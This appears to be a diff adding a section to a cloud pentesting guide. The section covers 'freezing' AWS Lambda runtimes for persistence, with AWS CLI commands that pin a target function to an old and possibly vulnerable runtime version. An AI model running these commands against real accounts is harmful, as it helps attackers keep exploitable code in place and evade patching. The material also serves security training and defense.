update

src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md

@@ -87,6 +87,54 @@ This is stealthier than exposing a Function URL and doesn’t change the primary
 aws-lambda-alias-version-policy-backdoor.md
 {{#endref}}
 
+### Freezing AWS Lambda Runtimes
+
+An attacker who has lambda:InvokeFunction, logs:FilterLogEvents, lambda:PutRuntimeManagementConfig, and lambda:GetRuntimeManagementConfig permissions can modify a function’s runtime management configuration. This attack is especially effective when the goal is to keep a Lambda function on a vulnerable runtime version or to preserve compatibility with malicious layers that might be incompatible with newer runtimes.
+
+The attacker modifies the runtime management configuration to pin the runtime version:
+
+```bash
+# Invoke the function to generate runtime logs
+aws lambda invoke \
+    --function-name $TARGET_FN \
+    --payload '{}' \
+    --region us-east-1 /tmp/ping.json
+
+sleep 5
+
+# Freeze automatic runtime updates on function update
+aws lambda put-runtime-management-config \
+    --function-name $TARGET_FN \
+    --update-runtime-on FunctionUpdate \
+    --region us-east-1
+```
+
+Verify the applied configuration:
+```bash
+aws lambda get-runtime-management-config \
+    --function-name $TARGET_FN \
+    --region us-east-1
+```
+
+Optional: Pin to a specific runtime version
+```bash
+# Extract Runtime Version ARN from INIT_START logs
+RUNTIME_ARN=$(aws logs filter-log-events \
+    --log-group-name /aws/lambda/$TARGET_FN \
+    --filter-pattern "INIT_START" \
+    --query 'events[0].message' \
+    --output text | grep -o 'Runtime Version ARN: [^,]*' | cut -d' ' -f4)
+```
+
+Pin to a specific runtime version:
+
+```bash
+aws lambda put-runtime-management-config \
+    --function-name $TARGET_FN \
+    --update-runtime-on Manual \
+    --runtime-version-arn $RUNTIME_ARN \
+    --region us-east-1
+```
 
 {{#include ../../../../banners/hacktricks-training.md}}